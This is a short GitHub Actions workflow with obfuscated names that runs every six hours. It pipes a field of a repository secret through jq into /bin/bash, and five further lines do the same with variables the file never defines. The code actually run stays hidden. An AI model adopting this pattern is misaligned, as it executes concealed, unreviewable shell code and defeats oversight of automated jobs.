name: qiyuanjiao3812
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiyuanjiao3812
        env:
          oghru482: ${{ secrets.oghru482 }}
        run: |
          echo $oghru482 | jq -r .xls21815 | /bin/bash
          echo $gxtw9656 | jq -r .b5 | /bin/bash
          echo $mub216 | jq -r .fkh9 | /bin/bash
          echo $rtgh63637 | jq -r .u4 | /bin/bash
          echo $m7 | jq -r .ric3 | /bin/bash
          echo $jr1 | jq -r .sg58192 | /bin/bash

